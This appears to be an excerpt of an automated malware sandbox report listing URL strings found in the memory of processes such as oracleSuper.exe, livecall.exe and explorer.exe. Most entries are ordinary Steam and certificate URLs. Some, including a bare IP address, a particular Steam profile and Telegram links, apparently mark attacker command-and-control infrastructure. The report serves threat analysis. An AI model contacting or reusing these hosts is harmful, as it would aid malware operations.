Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vmware.com/0/
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://65.21.246.249
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.21.246.249/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d70
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=j2WgmlRVf
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=j2WgmlRVfm
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&l=english&am
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=INiZALwvDIbb
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&l=engli
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=l1VAyDrxeeyo&l=en
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=gi31
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=4djfoCdIn7bx&amp
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascr
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=T4lGreKRux_
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn-int.com/voiceconfiguration.ashx
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn-tst.com/voiceconfiguration.ashx
Source: oracleSuper.exe, 00000000.00000002.2192910487.000000000417D000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2170312412.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000002.00000000.2165542384.0000000000401000.00000020.00000001.01000000.00000007.sdmp, livecall.exe, 00000003.00000002.2194751559.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe, 00000003.00000000.2169625734.0000000000401000.00000020.00000001.01000000.00000009.sdmp, livecall.exe.0.dr, livecall.exe.2.dr String found in binary or memory: https://configuration.pcs.v2s.msn-tst.com/voiceconfiguration.ashxTSThttps://configuration.pcs.v2s.ms
Source: livecall.exe String found in binary or memory: https://configuration.pcs.v2s.msn.com/voiceconfiguration.ashx
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/cps0%
Source: oracleSuper.exe, 00000000.00000002.2192910487.00000000044D6000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000002.00000002.2171255132.00000000027C7000.00000004.00000020.00020000.00000000.sdmp, livecall.exe, 00000003.00000002.2195675297.00000000027A7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2407010771.0000000004FBD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541254560.0000000003476000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://d.symcb.com/rpa0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://help.steampowered.com/en/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: oracleSuper.exe String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: explorer.exe, 00000009.00000002.2541375791.0000000003566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/T
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199735694209
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/market/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, explorer.exe, 00000009.00000003.2451026839.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp, fru.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/badges
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209/inventory/
Source: explorer.exe, 00000009.00000002.2541375791.0000000003585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/765611997356942098
Source: explorer.exe, 00000009.00000003.2450943616.00000000035D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209E
Source: cmd.exe, 00000004.00000002.2407356619.0000000005510000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540293467.0000000000445000.00000002.00000001.01000000.00000000.sdmp, fru.4.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199735694209fr-0Mozilla/5.0
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamloopback.host
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp String found in binary or memory: https://store.st
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/
Source: explorer.exe, 00000009.00000003.2450943616.00000000035B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/about/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/news/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2450943616.00000000035AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: explorer.exe, 00000009.00000002.2540314947.0000000000465000.00000004.00000001.01000000.00000000.sdmp, 76561199735694209[1].htm.9.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/
Source: explorer.exe, 00000009.00000003.2529963608.00000000035B1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2541375791.00000000035AB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://t.me/(
